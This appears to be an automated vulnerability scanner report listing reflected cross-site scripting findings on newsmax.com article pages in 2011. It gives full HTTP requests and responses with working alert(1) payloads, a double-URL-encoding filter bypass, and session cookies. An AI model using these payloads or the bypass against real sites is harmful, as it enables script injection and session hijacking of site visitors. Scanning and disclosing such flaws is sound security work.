The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cdc78'%20a%3db%2071ab5e4ca06 was submitted in the REST URL parameter 5. This input was echoed as cdc78' a=b 71ab5e4ca06 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17cdc78'%20a%3db%2071ab5e4ca06/id/389851 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45883 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Top 5 ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17cdc78' a=b 71ab5e4ca06/id/389851' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 89858'%20a%3db%20f00bb1a6af5 was submitted in the REST URL parameter 7. This input was echoed as 89858' a=b f00bb1a6af5 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/38985189858'%20a%3db%20f00bb1a6af5 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41622 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/38985189858' a=b f00bb1a6af5' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c524%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ebda1408e22f was submitted in the REST URL parameter 7. This input was echoed as 4c524"><img src=a onerror=alert(1)>bda1408e22f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/3898514c524%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ebda1408e22f HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 42066 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href="javascript:printPage(3898514c524"><img src=a onerror=alert(1)>bda1408e22f);" class="article_tools_link"> ...[SNIP]...
1.63. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 49787'><script>alert(1)</script>a43f963cc7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851?49787'><script>alert(1)</script>a43f963cc7a=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46105 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Top 5 ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851?49787'><script>alert(1)</script>a43f963cc7a=1' class="article_tools_link"> ...[SNIP]...
1.64. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3dfa"><script>alert(1)</script>8b1dee82801 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851?a3dfa"><script>alert(1)</script>8b1dee82801=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46110 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Top 5 ...[SNIP]... javascript:fwdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851?a3dfa"><script>alert(1)</script>8b1dee82801=1')" class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 66ef7'%20a%3db%20756d7b3c9ed was submitted in the REST URL parameter 2. This input was echoed as 66ef7' a=b 756d7b3c9ed in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/supermoon-Japanese-tsunami-earthquake66ef7'%20a%3db%20756d7b3c9ed/2011/03/18/id/389964 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 63663 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Some ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-Japanese-tsunami-earthquake66ef7' a=b 756d7b3c9ed/2011/03/18/id/389964' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 61b74'%20a%3db%20e5a37a9c0f7 was submitted in the REST URL parameter 3. This input was echoed as 61b74' a=b e5a37a9c0f7 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/201161b74'%20a%3db%20e5a37a9c0f7/03/18/id/389964 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 63663 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Some ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-Japanese-tsunami-earthquake/201161b74' a=b e5a37a9c0f7/03/18/id/389964' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8adcf'%20a%3db%2002ec750a1ab was submitted in the REST URL parameter 4. This input was echoed as 8adcf' a=b 02ec750a1ab in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/038adcf'%20a%3db%2002ec750a1ab/18/id/389964 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 63663 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Some ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/038adcf' a=b 02ec750a1ab/18/id/389964' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 67dd1'%20a%3db%2043052552722 was submitted in the REST URL parameter 5. This input was echoed as 67dd1' a=b 43052552722 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/1867dd1'%20a%3db%2043052552722/id/389964 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 63663 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Some ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/1867dd1' a=b 43052552722/id/389964' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8dbe1'%20a%3db%20db65a001b85 was submitted in the REST URL parameter 7. This input was echoed as 8dbe1' a=b db65a001b85 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/3899648dbe1'%20a%3db%20db65a001b85 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41105 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/3899648dbe1' a=b db65a001b85' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf295%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e0416374c63c was submitted in the REST URL parameter 7. This input was echoed as cf295"><img src=a onerror=alert(1)>0416374c63c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964cf295%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e0416374c63c HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41553 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href="javascript:printPage(389964cf295"><img src=a onerror=alert(1)>0416374c63c);" class="article_tools_link"> ...[SNIP]...
1.71. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab48a"><script>alert(1)</script>634d853d2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964?ab48a"><script>alert(1)</script>634d853d2e=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 63881 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Some ...[SNIP]... <a href="javascript:fwdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964?ab48a"><script>alert(1)</script>634d853d2e=1')" class="article_tools_link"> ...[SNIP]...
1.72. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3e8c7'><script>alert(1)</script>75f499a6f0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964?3e8c7'><script>alert(1)</script>75f499a6f0c=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 63885 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Some ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964?3e8c7'><script>alert(1)</script>75f499a6f0c=1' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ab5a7'%20a%3db%20d6193e50b41 was submitted in the REST URL parameter 2. This input was echoed as ab5a7' a=b d6193e50b41 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/supermoon-largest-moon-saturdayab5a7'%20a%3db%20d6193e50b41/2011/03/18/id/389920 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 43644 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 'Supe ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-largest-moon-saturdayab5a7' a=b d6193e50b41/2011/03/18/id/389920' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload db41b'%20a%3db%2017ed13ad59c was submitted in the REST URL parameter 3. This input was echoed as db41b' a=b 17ed13ad59c in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/supermoon-largest-moon-saturday/2011db41b'%20a%3db%2017ed13ad59c/03/18/id/389920 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 43644 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:27 GMT Connection: close
